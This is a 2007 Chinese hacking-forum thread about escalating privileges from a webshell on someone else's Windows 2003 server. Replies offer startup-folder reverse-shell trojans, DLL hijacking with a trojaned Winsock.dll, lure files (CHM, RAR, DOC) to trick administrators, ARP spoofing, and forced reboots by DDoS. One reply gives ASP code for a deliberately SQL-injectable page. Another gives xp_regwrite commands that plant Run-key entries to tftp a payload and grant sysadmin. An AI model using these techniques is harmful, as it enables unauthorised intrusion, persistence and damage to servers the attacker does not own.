[讨论]依然是提权问题 希望大家来探讨下
议题作者:教主信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
拥有webshell.
主机支持asp aspx
目标:拿下主机的系统控制权
权限描述:
可以上传文件。在任何目录都可以上传。但不可以执行文件。
没有servu 没有pcanywhere.没开3389.
装了mssql 但端口不对外开放。
在主机上寻找了N久。只找到dbo的用户和密码。但找到其他内网主机的sa用户密码。
用sqlrootkit连接内网sa不能连接。
只能执行普通的命令。比如:net user ipconfig netstat -an 等。不能添加删除用户。
不能替换文件。只能上传。
-------------------------------------------------------------------------
目前依然没突破口。。。。
主机系统:Windows 2003
-------------------------------------------------------------------------
[color=#FF0000]看了大家的回复。。。我再补充:
1:主机上未安装杀毒软件。
2:启动目录不可写(其他目录可以.但不能覆盖以存在的)
3:拥有当前webshell主机的dbo的帐号密码.用SQLRootkit.aspx 可以连上本机的dbo。
拥有一个IP段的其他IP的SA帐号密码。但是不允许外连。用SQLRootkit.aspx 在webshell主机也连不过去。
4:不重起对方服务器的前提下拿到系统权限。
各位老大有招没。。尽管使。。。[/color] 俺是小菜菜
遇到没有servu 没有pcanywhere.没开3389的情况
俺就把反弹木马或者3389.exe(跟添加系统帐号bat绑在一起)丢到启动项里
后面的有点卑鄙,不过对于日本的主机俺没犹豫过,D强迫重启…… [quote]引用第0楼教主于2007-03-23 07:56发表的 [讨论]依然是提权问题...希望大家来探讨下。 :
只能执行普通的命令。比如:net user ipconfig netstat -an 等。不能添加删除用户。[/quote]
难道MSSQL以user启动?第二次见到这种情况 昨晚遇到一只NX 的虚拟主机,组件木了,NTFS权限初看很BT~su低权限启动直接提权无望
无奈中竟然发现 启动 目录可写
狂晕不知这个管理是如何做的。。
教主的任何目录上传包括这个鸟目录么? [quote]但找到其他内网主机的sa用户密码[/quote]
这是怎么找到的?
是不是这台主机上面的有的站的数据库在本机,有的站的数据库在别的机子上?也就是你是从conn.asp看的吧。
如果是这样,外面连他一般是会拒绝的,不过对于会asp的人,在这台主机上面用数据库机的sa密码连数据库主机(必然能连上)拿下数据库主机不是难事。
或者,你既然看到sa密码了,那你就看看有没有sa注入点阿,如果没有就自己构造一个嘛。。。include那个conn.asp,查库不过滤就好了阿。
搞到同网段的先,然后嗅探。 [quote]引用第3楼cnhcerkf于2007-03-23 12:03发表的 :
昨晚遇到一只NX 的虚拟主机,组件木了,NTFS权限初看很BT~su低权限启动直接提权无望
无奈中竟然发现 启动 目录可写
狂晕不知这个管理是如何做的。。
教主的任何目录上传包括这个鸟目录么?[/quote]
哈~ 这方法不错不错啊 呵呵 4楼大哥,照楼主的说法,那一定sa已经不是最高权限了,所以即使构造了sql注入也没有啊 [quote]用sqlrootkit连接内网sa不能连接。[/quote]
如果sa被降权了,用sqprootkit连sa,不是吃饱了撑着。就为在内网再拿一个shell,不能让人信服。
lz说的的sa必然是未降的。
不过我觉得既然lz没有联上DB,说明他自己也还不知道sa降权了,不过没有降是最常规的推断。也许lz并没有考虑到sa的权限可能会被降,楼上多虑了。
ps:这个是HDSI那个教主吗?[s:263] 不过我寒一下,既然sqlrootkit(这是aspx马中的功能吧)连不上,那就说明这个sa密码一点用都没有。因为sqlrootkit的原理和conn.asp连数据库的原理是一样的阿。如果这个DB服务器确实存在,那么conn.asp能连上,必然sqlrootkit能连。
所以我慌一下,这个conn.asp是不是在一个网站的备份文件中呢?也就是说根本就没有这样一个实际运行中的站用这个sa密码去连内网的一台主机。。。。。 恩...启动里加是个好方法!
既然能些进去,这样BT的服务器,我们可以用自动播放来运行你的马不? [quote]引用第0楼教主于2007-03-23 07:56发表的 [讨论]依然是提权问题...希望大家来探讨下。 :
可以上传文件。在任何目录都可以上传。但不可以执行文件。
.......[/quote]
可以考虑利用DLL的加载顺序本目录优先的原理,在某个程序的安装目录下上传个处理过的系统DLL,如Winsock.dll。 上传个处理过的系统DLL?难道在.dll上捆绑一个后门?然后管理员运行那个程序,触发后门,要等到何年何月啊
那怎么不直接捆绑在杀毒软件上 [quote]引用第10楼langouster于2007-03-23 16:58发表的 :
可以考虑利用DLL的加载顺序本目录优先的原理,在某个程序的安装目录下上传个处理过的系统DLL,如Winsock.dll。[/quote]
貌似这思路不错,WINDOWS加载动态连接库的顺序是程序目录,系统目录,WINDOWS目录,PATH环境变量指定的目录,你测试过没? "可以上传文件。在任何目录都可以上传。但不可以执行文件。"
[s:264] 和我哥说的一样,上传到启动目录,然后肉鸡伺候,重启之.... [quote]引用第10楼langouster于2007-03-23 16:58发表的 :
可以考虑利用DLL的加载顺序本目录优先的原理,在某个程序的安装目录下上传个处理过的系统DLL,如Winsock.dll。[/quote]
在一个网络程序目录里上传一个dll木马,名为Winsock.dll..............
还不如直接命名为kernel32.dll,这样范围更大些...[s:269] [quote]引用第3楼cnhcerkf于2007-03-23 12:03发表的 :
昨晚遇到一只NX 的虚拟主机,组件木了,NTFS权限初看很BT~su低权限启动直接提权无望
[/quote]
乍看还以为弄上了同一台服务器。。。。[s:267]
但目前我手上这台没有SU、PCAnywhere、3389,连〖Wscript.Shell〗和〖AspDll.Shell〗都不能执行。[s:278]
每个子站独立分配帐号,而且权限极低,就差直接往guests里扔了。日
[quote]无奈中竟然发现 启动 目录可写
狂晕不知这个管理是如何做的。。[/quote]
但这是一样的,上传个反连马,嘎嘎
问题是怎么让它重启涅?偶米有肉鸡招呼[s:238]
偶的拜贴:
[url]http://forum.eviloctal.com/read-htm-tid-27698.html[/url] [quote]引用第11楼hackloves于2007-03-23 18:28发表的 :
上传个处理过的系统DLL?难道在.dll上捆绑一个后门?然后管理员运行那个程序,触发后门,要等到何年何月啊
那怎么不直接捆绑在杀毒软件上[/quote]
确实用那种方法提权不如用那种方法留个后门,隐藏啊。。。 弄个什么rar溢出啊,doc溢出啊起个显眼的名字放他桌面.弄几个马改名cmd.com,regedit.com,msconfig.com..一起丢到system32目录...再然后等待... 这种情况多半是内网里的数据库服务器吧 手头里有个美国的这样的 登陆3389时发现是那台web主机的 ,好像只有用内网鸽子了~~ 如果可以看系统服务项,那就好,根据系统启动的文件,路径,(system32)似乎进不了,可以察看其他路径,把源文件下下来,捆绑个反弹之类的木马,在传上去,把原来的删除了,成功的话,DDOS一下主机,等待主机重新起动。。。。 觉得 既然每个目录都有写的权限 最简单的就是在启动组里写进我们的东西 等他重启 要是不想重启提权 看来是有点困难 [quote]引用第19楼小暴于2007-03-24 02:38发表的 :
如果可以看系统服务项,那就好,根据系统启动的文件,路径,(system32)似乎进不了,可以察看其他路径,把源文件下下来,捆绑个反弹之类的木马,在传上去,把原来的删除了,成功的话,DDOS一下主机,等待主机重新起动。。。。[/quote]
说得倒轻巧,你有权限把原来的程序del吗?如果有,恐怕教主都不会上来讨论了。[s:289] 就算有权限也不能DEL, 也不想想后果. 我那个和教主一样的,就是可以执行user权限的程序
比如aio什么的
倒是可以传个nc用webshell进行sniff。。。
不过现在。我那个shell已经被发现了。现在貌似也和教主的一样了
不可以执行任何文件了
好在我有了他的一个user用户密码
FTP是微软的。硬盘NTFS
又有某人说可以用NTFS流
完全是不行的,因为你说你本地生成吧cscript命令是不能执行的,你说远程生成ADS流在传,貌似会流失,就算做成rar自解压,和木马有什么区别?
PS:菜鸟的说话,各位大侠有说错的地方请指教。。。
另:我提交了个问题,怎么不见通过?? 同一网段渗透行不? [quote]引用第13楼asm于2007-03-23 19:30发表的 :
"可以上传文件。在任何目录都可以上传。但不可以执行文件。"
[s:264] 和我哥说的一样,上传到启动目录,然后肉鸡伺候,重启之....[/quote]
如果,启动目录都可以上传,这个问题,教主更有必要发帖吗?
每个目录都可以上传,你就保不定他不可以重命名? [quote]引用第25楼小暴于2007-03-25 01:20发表的 :
如果,启动目录都可以上传,这个问题,教主更有必要发帖吗?
每个目录都可以上传,你就保不定他不可以重命名?[/quote]
拜托,看清帖子在说,教主说任何目录都有上传的权限OK?
[color=#FF0000]“每个目录都可以上传,你就保不定他不可以重命名”[/color]
可以重命名,但是重命名为一个现有文件名,你知道意味着什么吗?考虑
了没有?比如有一个程序admin.exe,你把你的程序传上去重命名为admin.exe的时候,意味着你将要
把原来的给覆盖删除掉。这样一来,就表明已经有可删除的权限了。 [quote]引用第26楼asm于2007-03-25 03:47发表的 :
拜托,看清帖子在说,教主说任何目录都有上传的权限OK?
[color=#FF0000]“每个目录都可以上传,你就保不定他不可以重命名”[/color]
.......[/quote]
每个网站,每个目录的权限设置都是不一样的!难道非要除了,"system32" 这些主要系统路径,其他路径文件就不可以删除?
为什么,光有些网站其他路径都不可以上传,就是C:\Documents and Settings\All Users\Documents,可以上传,删除呢?,而有些又不可以呢?
[color=#FF0000]ASM“可能是你经验高才于我,我才学浅薄。自魁。你不必与我诤言”[/color] 这么多大虾都不会 我肯定也不会了 [s:269] 如果用SQLROOT.ASPX都连不上内网的SA,可能真如前面一个兄弟所说,这个SA可能不存在或者是备份,如果存在,SQLROOT是应该可能连接成功的,那样可以先拿下内网的数据库机器.然后SNIFFE
刚有人说往启动目录里写和绑马,楼主的议题是不重启服务器的情况下.所以不可行.
可以试试MDB的溢出提权.或者系统溢出方面. 应该是内网的,我也有这么一台WebShell,可就是怎么也不能提权。不过楼主既然得到同网段的SA了,那你使用跨站或者同网段渗透试试,只是个想法,自己的技术还较菜,不会,呵呵。
还有,有些朋友说在启动项里添加等重启,个人认为不太好,管理员只要有一定的安全防范意识,
就很容易被发现,甚至连WebShell也给丢了。 跟我遇见那台差不多,装了卡巴加诺顿。记着有这两个的EXP,却死活找不到。net user也能执行,死活不能添加用户,数据库还是ACC的。所有数据库密码后台密码都试了,没有一个能连上3389的。看来学校那网管逼着我哪天上五楼机房砸了那台服务器 还有刚才谁说弄个RAR0day来着?那东西是用来卖的,好像一万一个 我比较菜拉,不过这种配置的鸡,只要C盘可写,肯定就可以拿下,只是时间问题了。懒的话就ARP内网欺骗慢慢等,时间多的话就想个陷阱给网管,看他装什么服务,看最近访问的文档和程序,然后把你的马捆绑好给他重新传个。
希望能有高手来给个有技术含量的方法。 [url]http://forum.eviloctal.com/read-htm-tid-18569-keyword-.html[/url] 不知道能不能帮上忙:)
如何伪造SQL注点?
都有webshell了,可以用它直接连接数据库来执行数据查询,不用再伪造注入点文件了,另外你可以直接修改网站上的原ASP文件,把里面的过滤函数包括语句删除掉就有注入点了,一般过滤函数都inlcude在数据库连接文件conn.asp文件中.
在目标上先构造一个存在注入点的文件a.asp,里面的admin表是存在的,conn.asp是数据库连接程序,记得要把conn.asp文件中过滤函数包括语句给删掉,ASP代码如下:
<%
SQL=""
if request("str") <>"" then
sql="select * from article where data like '%"&_
Request("str")&"%' "
elseif request("id")<>"" Then
sql="select * from article where id="&request("id")&""
elseif request("link")<>"" Then
sql="select * from article where link='"&request("link")&"' "
end if
if(SQL<>"") then
strSQL="driver={SQL Server};server=(local);"&_
"database=lalala;uid=test1;pwd=123;"
set conn=server.createobject("ADODB.CONNECTION")
conn.open strSQL
set rs=conn.execute(sql)
if not rs.bof then
while(not rs.eof)
response.write ""&_
"ID :"&rs("id")&VBCRLF&"<br>"&_
"Data:"&rs("Data")&vbcrlf&"<br>"&_
"Link: "&rs("link")&vbcrlf&"<br><br>"
rs.MoveNext
wend
Else
response.write "你查询的数据不存在!"
End if
set rs=Nothing
conn.close
End if
%>
<form action="search.asp">
文章ID :<input name="id"><p>
文章特征字符 :<input name="str"><p>
文章来源 :<input name="link"><p>
<p>
<input type="submit" value="提交">
</form>
然后输入:http://目标IP/a.asp?id=1
完成了,就这么简单,其他的信息就让他全部自己暴露出来吧.打开nbsi,一顿狂注,什么信息都出来啦。. 2:启动目录不可写的问题解决方法:利用xp_regwrite来写入启动
利用xp_regwrite与xp_regread将SQl的用户test1提升为sysadmin用户(即dbo),机器重启后就是数据库管理员权限了:
1);EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe /c echo EXEC sp_addsrvrolemember test1, sysadmin >c:\test.qry'--
2);EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','tftp -i 192.168.1.200 get test.qry c:\test.qry'--
3);EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help2','REG_SZ','cmd.exe /c isql -E /U alma /P /i c:\test.qry'--
需要重启系统才能成功的利用。
删除help1和help2键值:
1);EXEC master.dbo.xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1'
2);EXEC master.dbo.xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help2' [quote]引用第34楼pt007于2007-03-25 23:15发表的 :
[url]http://forum.eviloctal.com/read-htm-tid-18569-keyword-.html[/url] 不知道能不能帮上忙:)
如何伪造SQL注点?
都有webshell了,可以用它直接连接数据库来执行数据查询,不用再伪造注入点文件了,另外你可以直接修改网站上的原ASP文件,把里面的过滤函数包括语句删除掉就有注入点了,一般过滤函数都inlcude在数据库连接文件conn.asp文件中.
在目标上先构造一个存在注入点的文件a.asp,里面的admin表是存在的,conn.asp是数据库连接程序,记得要把conn.asp文件中过滤函数包括语句给删掉,ASP代码如下:
<%
.......[/quote]
要伪造注入点,至少数据库是用sa连接,这样注入点才有权限,不然提权是木用貌似[s:263] 还是那句话.没路走的时候多想想社会工程学.
搞个chm木马.丢上去.改个比较吸引人的名字.色诱他运行.
搞成其他bat之类的马不安全.可信度不高.管理员、基本不会开.
搞个chm的可信度比较高~!~ 替换服务行不???????
我也遇到了这样的情况,web和数据库分离,在内网,加帐号也不容易. [quote]引用第2楼ttfct于2007-03-23 10:38发表的 :
难道MSSQL以user启动?第二次见到这种情况[/quote]
更改一下启动服务的帐户不是什么麻烦事,只不过网管一般想不到去改这个地方而已。 我是刚来的菜鸟 不知道LZ是不是就是传说中的那个 "教主"? 要是真的话 小弟在次膜拜一下。。 支持PHP吗?
C:PHP 有没有,能替换的服务咯`
页:
[1]